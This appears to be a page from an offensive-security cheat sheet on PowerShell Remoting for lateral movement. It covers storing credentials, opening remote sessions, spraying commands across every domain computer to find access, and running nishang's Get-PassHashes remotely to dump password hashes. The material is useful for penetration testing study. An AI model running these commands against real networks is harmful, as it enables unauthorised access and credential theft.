Powershell Remoting

Instead of having to connect to a workstation from outside of the network everytime in order to execute commands, if we are already in a Powershell session we can either start a new session in our target box or issue commands on the target remotely from the current session we are in.

Executing commands in such a manner is less noisy of course. You can run scripts or local functions from your current workstation onto your target remotely. You can even issue commands to multiple targets in the network in one statement if you have the privileges to do so (Fan-Out Remoting).

You may have to enable remoting (Enable-PSRemoting) on your workstation if PSRemoting is not enabled already, but you need Administrator privileges to do so.

This works excellently in conjunction with Pass-the-Hash.

Some of these commands will require PowerView.

Storing Credentials into the Session

  • Method 1: Using the Get-Credential cmdlet from a remote desktop:

$creds = Get-Credential <user>  # then enter the password in the popup

  • Method 2: Using the New-Object-Cmdlet

$user = '<user>'
$pwd = '<password>'
$secure_pwd = $pwd | ConvertTo-SecureString -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential -ArgumentList $user, $secure_pwd

Begin a New Session on Another Workstation

Enter-PSSession -ComputerName <computer>

Running a Stateful Session and Then Entering It

$sess = New-PSSession -ComputerName <computer> [-Credential $creds]
Enter-PSSession -Session $sess

Executing Commands Remotely on Another Workstation

Invoke-Command -ComputerName <computer> -ScriptBlock {<command>}
Invoke-Command -Session $sess -ScriptBlock {<command>}

Spraying Computers to See Where You Have Access

Invoke-Command -ScriptBlock {hostname;whoami} -Credential $cred -ComputerName (Get-NetComputer)

  • My little script is a bit cleaner...

foreach ($comp in Get-NetComputer) {
    $comp + ' : ' + (Invoke-Command -ScriptBlock {whoami} -ComputerName $comp 2>$NUL)
    }

Executing Scripts Remotely

Invoke-Command -FilePath <C:\path\to\script> -ComputerName <computer> [-Credential $cred]

  • You can spray this command onto other workstations at once as well...

Invoke-Command -FilePath <C:\path\to\script> -ComputerName (Get-NetComputer)

Execute Locally Loaded Functions on Remote Machines

# Using Get-PassHashes.ps1 from nishang as an example
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-NetComputer) [-ArgumentList <args>] [-Credential $cred] 2>$NUL

Copying Files Remotely

Copy-Item -ToSession $sess -Path C:\local\path\to\file -Destination C:\destination\path
PreviousSkeleton KeysNextLateral Movement

Last updated